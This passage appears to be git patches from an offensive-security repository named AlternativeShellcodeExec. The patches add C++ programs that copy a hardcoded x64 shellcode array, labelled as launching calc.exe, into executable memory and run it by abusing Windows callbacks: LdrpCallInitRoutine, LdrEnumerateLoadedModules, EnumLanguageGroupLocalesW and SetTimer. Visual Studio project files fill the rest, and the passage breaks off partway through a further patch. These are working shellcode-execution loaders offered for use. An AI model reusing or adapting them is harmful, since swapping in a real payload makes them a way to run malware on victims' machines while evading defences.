/dev/null +++ b/LdrpCallInitRoutine/Source.cpp @@ -0,0 +1,48 @@ +#include +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + +typedef size_t(__fastcall* lpCallInitRoutine)(size_t, size_t, size_t); +typedef char(__fastcall* pLdrpCallInitRoutine)(lpCallInitRoutine, size_t, unsigned int, size_t); + +#define NTDLL_LDRPCALLINITRT_OFFSET 0x000199bc +// ? ntdll!LdrpCallInitRoutine - ntdll + +int main() { + HANDLE hProcess = ::GetCurrentProcess(); + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (!address) { return -1; } + memcpy(address, &op[0], sizeof(op)); + + uintptr_t hNtdll = (uintptr_t)GetModuleHandleA("ntdll"); + if (!hNtdll) { return -1; } + + // todo: find a better way to get LdrpCallInitRoutine. I'm lazy right now. + uintptr_t func = hNtdll + NTDLL_LDRPCALLINITRT_OFFSET; + pLdrpCallInitRoutine LdrpCallInitRoutine = (pLdrpCallInitRoutine)func; + LdrpCallInitRoutine((lpCallInitRoutine)address, 0, 0, 0); + +} \ No newline at end of file From f82372e2d1d4497937c1b1e6b0f148299f30ebda Mon Sep 17 00:00:00 2001 From: S4R1N Date: Tue, 30 Mar 2021 16:00:45 -0400 Subject: [PATCH 08/28] Added LdrEnumerateLoadedModules ftw --- AlternativeShellcodeExec.sln | 10 ++ .../LdrEnumerateLoadedModules.cpp | 98 ++++++++++++ .../LdrEnumerateLoadedModules.vcxproj | 147 ++++++++++++++++++ .../LdrEnumerateLoadedModules.vcxproj.filters | 22 +++ 4 files changed, 277 insertions(+) create mode 100644 LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp create mode 100644 LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj create mode 100644 LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 142bd97..755c23c 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -55,6 +55,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FlsAlloc", "FlsAlloc\FlsAll EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumPropsW", "EnumPropsW\EnumPropsW.vcxproj", "{2253DC4A-3941-4809-A20D-416CA71F799A}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LdrEnumerateLoadedModules", "LdrEnumerateLoadedModules\LdrEnumerateLoadedModules.vcxproj", "{C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -271,6 +273,14 @@ Global {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x64.Build.0 = Release|x64 {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x86.ActiveCfg = Release|Win32 {2253DC4A-3941-4809-A20D-416CA71F799A}.Release|x86.Build.0 = Release|Win32 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Debug|x64.ActiveCfg = Debug|x64 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Debug|x64.Build.0 = Debug|x64 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Debug|x86.ActiveCfg = Debug|Win32 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Debug|x86.Build.0 = Debug|Win32 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x64.ActiveCfg = Release|x64 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x64.Build.0 = Release|x64 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x86.ActiveCfg = Release|Win32 + {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp new file mode 100644 index 0000000..bacf580 --- /dev/null +++ b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp @@ -0,0 +1,98 @@ +#include +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + +// including ntdef.h was breaking the program so I just simply got the typedef from: +// https://docs.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_unicode_string + +typedef struct _UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING, * PUNICODE_STRING; + +// https://doxygen.reactos.org/d1/d97/ldrtypes_8h_source.html + +typedef PVOID PACTIVATION_CONTEXT; + +typedef struct _LDR_DATA_TABLE_ENTRY +{ + LIST_ENTRY InLoadOrderLinks; + LIST_ENTRY InMemoryOrderLinks; + LIST_ENTRY InInitializationOrderLinks; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + USHORT LoadCount; + USHORT TlsIndex; + union + { + LIST_ENTRY HashLinks; + struct + { + PVOID SectionPointer; + ULONG CheckSum; + }; + }; + union + { + ULONG TimeDateStamp; + PVOID LoadedImports; + }; + PACTIVATION_CONTEXT EntryPointActivationContext; + PVOID PatchInformation; +} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; + +typedef VOID(NTAPI LDR_ENUM_CALLBACK)(_In_ PLDR_DATA_TABLE_ENTRY ModuleInformation, _In_ PVOID Parameter, _Out_ BOOLEAN* Stop); +typedef LDR_ENUM_CALLBACK* PLDR_ENUM_CALLBACK; + +// https://doxygen.reactos.org/d7/d55/ldrapi_8c.html#ac623c02eff0b751a63f8573eaca95153 + +typedef NTSTATUS(__stdcall* _LdrEnumerateLoadedModules)( + BOOL ReservedFlag, + LDR_ENUM_CALLBACK EnumProc, + PVOID context + ); + + +int main() { + + HANDLE hProcess = ::GetCurrentProcess(); + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + HMODULE hNtdll = ::GetModuleHandleW(L"ntdll"); + + if (hNtdll) { + + _LdrEnumerateLoadedModules LdrEnumerateLoadedModules = (_LdrEnumerateLoadedModules)::GetProcAddress(hNtdll, "LdrEnumerateLoadedModules"); + LdrEnumerateLoadedModules(NULL, (PLDR_ENUM_CALLBACK)address, NULL); + + } + +} \ No newline at end of file diff --git a/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj new file mode 100644 index 0000000..c5f18b7 --- /dev/null +++ b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {c88f3c63-7ae2-49f3-a96f-ac11e44dad3f} + LdrEnumerateLoadedModules + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj.filters b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj.filters new file mode 100644 index 0000000..d7e5dd0 --- /dev/null +++ b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From af0464c02d7d33de5799486f29c249362ae37d21 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Tue, 30 Mar 2021 16:10:08 -0400 Subject: [PATCH 09/28] removed unnecessary getcurrentprocess op --- LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp | 2 -- 1 file changed, 2 deletions(-) diff --git a/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp index bacf580..707f38f 100644 --- a/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp +++ b/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp @@ -81,8 +81,6 @@ typedef NTSTATUS(__stdcall* _LdrEnumerateLoadedModules)( int main() { - HANDLE hProcess = ::GetCurrentProcess(); - LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(address, &op[0], sizeof(op)); From 4717ffca7c22b4396fd9397b135b84c99cdcff68 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Wed, 31 Mar 2021 13:34:11 -0400 Subject: [PATCH 10/28] Been scavenging the windows API since bug bounty hunters started calling themsleves researchers. --- AlternativeShellcodeExec.sln | 10 ++ .../EnumLanguageGroupLocalesW.cpp | 41 +++++ .../EnumLanguageGroupLocalesW.vcxproj | 147 ++++++++++++++++++ .../EnumLanguageGroupLocalesW.vcxproj.filters | 22 +++ 4 files changed, 220 insertions(+) create mode 100644 EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.cpp create mode 100644 EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj create mode 100644 EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 755c23c..df13683 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -57,6 +57,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumPropsW", "EnumPropsW\En EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LdrEnumerateLoadedModules", "LdrEnumerateLoadedModules\LdrEnumerateLoadedModules.vcxproj", "{C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumLanguageGroupLocalesW", "EnumLanguageGroupLocalesW\EnumLanguageGroupLocalesW.vcxproj", "{8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -281,6 +283,14 @@ Global {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x64.Build.0 = Release|x64 {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x86.ActiveCfg = Release|Win32 {C88F3C63-7AE2-49F3-A96F-AC11E44DAD3F}.Release|x86.Build.0 = Release|Win32 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Debug|x64.ActiveCfg = Debug|x64 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Debug|x64.Build.0 = Debug|x64 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Debug|x86.ActiveCfg = Debug|Win32 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Debug|x86.Build.0 = Debug|Win32 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x64.ActiveCfg = Release|x64 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x64.Build.0 = Release|x64 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x86.ActiveCfg = Release|Win32 + {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.cpp b/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.cpp new file mode 100644 index 0000000..31e2bab --- /dev/null +++ b/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.cpp @@ -0,0 +1,41 @@ +#include +#include + + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + + EnumLanguageGroupLocalesW((LANGGROUPLOCALE_ENUMPROCW)address, LGRPID_ARABIC, 0, 0); + + return 0; + +} \ No newline at end of file diff --git a/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj b/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj new file mode 100644 index 0000000..f4e1310 --- /dev/null +++ b/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {8f7c78f7-1ce5-41f8-baa7-92b297248db4} + EnumLanguageGroupLocalesW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj.filters b/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj.filters new file mode 100644 index 0000000..5dd105b --- /dev/null +++ b/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 8fabb6f72ac1e980e674ad52e3d87a8a742309c6 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Thu, 1 Apr 2021 16:55:35 -0400 Subject: [PATCH 11/28] Commit --- AlternativeShellcodeExec.sln | 10 ++ SetTimer/SetTimer.cpp | 47 ++++++++++ SetTimer/SetTimer.vcxproj | 147 ++++++++++++++++++++++++++++++ SetTimer/SetTimer.vcxproj.filters | 22 +++++ 4 files changed, 226 insertions(+) create mode 100644 SetTimer/SetTimer.cpp create mode 100644 SetTimer/SetTimer.vcxproj create mode 100644 SetTimer/SetTimer.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index df13683..c4a9398 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -59,6 +59,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LdrEnumerateLoadedModules", EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumLanguageGroupLocalesW", "EnumLanguageGroupLocalesW\EnumLanguageGroupLocalesW.vcxproj", "{8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SetTimer", "SetTimer\SetTimer.vcxproj", "{B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -291,6 +293,14 @@ Global {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x64.Build.0 = Release|x64 {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x86.ActiveCfg = Release|Win32 {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x86.Build.0 = Release|Win32 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Debug|x64.ActiveCfg = Debug|x64 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Debug|x64.Build.0 = Debug|x64 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Debug|x86.ActiveCfg = Debug|Win32 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Debug|x86.Build.0 = Debug|Win32 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x64.ActiveCfg = Release|x64 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x64.Build.0 = Release|x64 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x86.ActiveCfg = Release|Win32 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/SetTimer/SetTimer.cpp b/SetTimer/SetTimer.cpp new file mode 100644 index 0000000..e193044 --- /dev/null +++ b/SetTimer/SetTimer.cpp @@ -0,0 +1,47 @@ +#include +#include + + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + UINT_PTR dummy = 0; + MSG msg; + + ::SetTimer(NULL, dummy, NULL, (TIMERPROC)address); + + ::GetMessageW(&msg, NULL, 0, 0); + ::TranslateMessage(&msg); + ::DispatchMessageW(&msg); + + return 0; + +} \ No newline at end of file diff --git a/SetTimer/SetTimer.vcxproj b/SetTimer/SetTimer.vcxproj new file mode 100644 index 0000000..e3df7f4 --- /dev/null +++ b/SetTimer/SetTimer.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {b014bcb9-7850-4ac7-bd7f-6b07db77de35} + SetTimer + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/SetTimer/SetTimer.vcxproj.filters b/SetTimer/SetTimer.vcxproj.filters new file mode 100644 index 0000000..2b550aa --- /dev/null +++ b/SetTimer/SetTimer.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From ba37bcf79677a2455ccdc6f52d20348dac3be4f6 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Thu, 1 Apr 2021 17:04:51 -0400 Subject: [PATCH 12/28] removed unecessary command --- SetTimer/SetTimer.cpp | 1 - 1 file changed, 1 deletion(-) diff --git a/SetTimer/SetTimer.cpp b/SetTimer/SetTimer.cpp index e193044..ec7cdc4 100644 --- a/SetTimer/SetTimer.cpp +++ b/SetTimer/SetTimer.cpp @@ -39,7 +39,6 @@ int main() { ::SetTimer(NULL, dummy, NULL, (TIMERPROC)address); ::GetMessageW(&msg, NULL, 0, 0); - ::TranslateMessage(&msg); ::DispatchMessageW(&msg); return 0; From e78103606470df4675b063cc3073c76eb676c36b Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sun, 4 Apr 2021 11:26:22 -0400 Subject: [PATCH 13/28] Added SetupCommitFileQueueW --- AlternativeShellcodeExec.sln | 10 ++ .../SetupCommitFileQueueW.cpp | 46 ++++++ .../SetupCommitFileQueueW.vcxproj | 147 